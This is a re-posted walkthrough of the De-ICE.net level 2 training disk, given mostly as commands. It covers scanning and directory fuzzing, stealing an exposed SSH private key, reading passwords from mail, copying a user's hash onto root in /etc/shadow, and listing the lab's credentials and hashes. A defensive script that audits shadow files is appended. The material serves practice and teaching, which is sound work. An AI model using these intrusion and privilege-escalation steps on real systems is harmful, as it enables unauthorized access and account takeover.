HOWTO : De-ICE.net v2.0 (1.100) {Level 2 - Disk 1}

*** Do NOT attack any computer or network without authorization or you may be put in jail. ***



Credit to : g0tmi1k



This is g0tmi1k's work, not mine. I re-post it here for educational purposes only, because I enjoy his videos very much and I am afraid of losing them.



The original post at here






What is this?



This is my walkthrough of how I broke into the De-ICE.net network, level 2, disk 1.



The De-ICE.net network is on a "live PenTest CD", that creates a target(s) on which to practise penetration testing; it has an "end goal" to reach.



What do I need?



BackTrack 4 (Final)

de-ice.net-2.100-1.1.iso (MD5: 09798f85bf54a666fbab947300f38163)

Dictionary(s)



Software

Name: De-ICE.net

Version: 2.0 (Level 1 - Disk 2 - IP Address: 1.100)

Home Page: http://www.de-ice.net or http://heorot.net/livecds/



Download Link:



http://heorot.net/instruction/tutorials/iso/de-ice.net-2.100-1.1.iso

http://www.mediafire.com/file/uyecnhvkeije0br/de-ice.net-2.100-1.0.part1.rar

http://www.mediafire.com/file/l2ezefrg05mmtrr/de-ice.net-2.100-1.0.part2.rar



Forums/Support: http://forums.heorot.net and http://forums.heorot.net/viewtopic.php?f=18&t=16

WiKi/Support: http://de-ice.net/hackerpedia/index.php/De-ICE.net_PenTest_Disks



Commands



nmap -n 192.168.2.1-255



nmap -n -sV -sS -O 192.168.2.100



nmap -n -sV -sS -O 192.168.2.101



firefox 192.168.2.100



[+]kate -> list of possible usernames. Save. Filename: usernames.txt



firefox 192.168.2.101



[+]BackTrack -> Vulnerability Identification -> Fuzzers -> JBroFuzz. Web Directories -> List of usernames (+ root, admin) with '~' in front. -> http://192.168.2.101 -> 80







firefox http://192.168.2.101/~pirrip



[+]kate -> Update usernames with the ones which we got a response from. Save.



[+]BackTrack -> Web Application Analysis -> Web (frontend) -> nikto2



./nikto.pl -host 192.168.2.101 -r ~pirrip/ -Display 124



firefox http://192.168.2.101/~pirrip/.ssh



// Save both files



mv /root/id_rsa /root/.ssh/id_rsa



mv /root/id_rsa.pub /root/.ssh/id_rsa.pub



chmod 000 /root/.ssh/id_rsa



chmod 000 /root/.ssh/id_rsa.pub



ssh pirrip@192.168.2.100

// Yes



mailx

// 3 - we see that havisham's password is 'changeme'. 7 - we see pirrip's password is '0l1v3rTw1st'



cd /etc/



vi passwd



// kate -> Update usernames with only valid ones.



vi group



sudo vi shadow

// edit (D, :22,22y, :put, i, root, ESCape, ESCape, d + [->],[up],d d). Save it (:w), exit (:q). Password: 0l1v3rTw1st



su

// Password: 0l1v3rTw1st



cd /root/



ls -a



cd .save/



ls -a



chmod -R 777 /root/



//In BackTrack//



scp pirrip@192.168.2.100:/root/.save/great_expectations.zip /root/



unzip great_expectations.zip



tar xf great_expectations.tar



strings Jan08



//In SSH//

sudo vi /var/mail/havisham



modprobe capability



//In BackTrack//

ftp 192.168.2.100

// Username: pirrip. Password: 0l1v3rTw1st //



ls -a



//In SSH//



exit





//In BackTrack//



[+]Firefox -> Send a REAL email to: philip.pirrip.ge@gmail.com

// GAME OVER



----------------------------------------------------------------------------------------------------

Users

root:P1ckw1ckP@p3rs root:$1$/Ta1Q0lT$CSY9sjWR33Re2h5ohV4MX/:13882:0:::::

havisham:changeme havisham:$1$qbY1hmdT$sVZn89wKvmLn0wP2JnZay1:13882:0:99999:7:::

pirrip:0l1v3rTw1st pirrip:$1$KEj04HbT$ZTn.iEtQHcLQc6MjrG/Ig/:13882:0:99999:7:::

magwitch: magwitch:$1$qG7/dIbT$HtTD946DE3ITkbrCINQvJ0:13882:0:99999:7:::

----------------------------------------------------------------------------------------------------
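A defender's view of the "sudo vi shadow" step and the Users list above, as an added example that is not part of g0tmi1k's walkthrough: a shadow-file audit that flags md5crypt ($1$) hashes and accounts carrying an identical salt+hash field, which is what a copied entry looks like. The function names are hypothetical; the sample data is constructed from the entries listed above, with the root line changed to show the state after the edit, and the daemon line is made up.

```shell
#!/bin/sh
# Added example (not from the original walkthrough): audit shadow-format lines.
# Findings, one per line:
#   EMPTY_PASSWORD <user>        no password set
#   WEAK_HASH <user>             $1$ = md5crypt, cheap to brute-force offline
#   SHARED_HASH <user> <other>   identical salt+hash on two accounts; salts are
#                                random, so this means an entry was copied

audit_shadow() {
    # Reads the file named in $1, or stdin when no argument is given.
    awk -F: '
        $2 == ""      { print "EMPTY_PASSWORD " $1; next }
        $2 ~ /^[!*]/  { next }                       # locked / no-login account
        $2 ~ /^\$1\$/ { print "WEAK_HASH " $1 }
        ($2 in owner) { print "SHARED_HASH " $1 " " owner[$2]; next }
                      { owner[$2] = $1 }
    ' "${1:--}"
}

# Constructed sample: the page's shadow entries, except that root now carries
# pirrip's hash field (the result of copying line 22 over root's entry).
# The daemon line is a made-up locked account.
sample_shadow() {
    cat <<'EOF'
root:$1$KEj04HbT$ZTn.iEtQHcLQc6MjrG/Ig/:13882:0:::::
havisham:$1$qbY1hmdT$sVZn89wKvmLn0wP2JnZay1:13882:0:99999:7:::
pirrip:$1$KEj04HbT$ZTn.iEtQHcLQc6MjrG/Ig/:13882:0:99999:7:::
magwitch:$1$qG7/dIbT$HtTD946DE3ITkbrCINQvJ0:13882:0:99999:7:::
daemon:*:13882:0:::::
EOF
}

sample_shadow | audit_shadow
```

On a real host, run it as root with audit_shadow /etc/shadow; any SHARED_HASH line deserves a look at who edited the file and when.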





Notes



Dictionaries : http://g0tmi1k.blogspot.com/2010/02/site-news-isos-and-dictionaries.html



That's all! See you.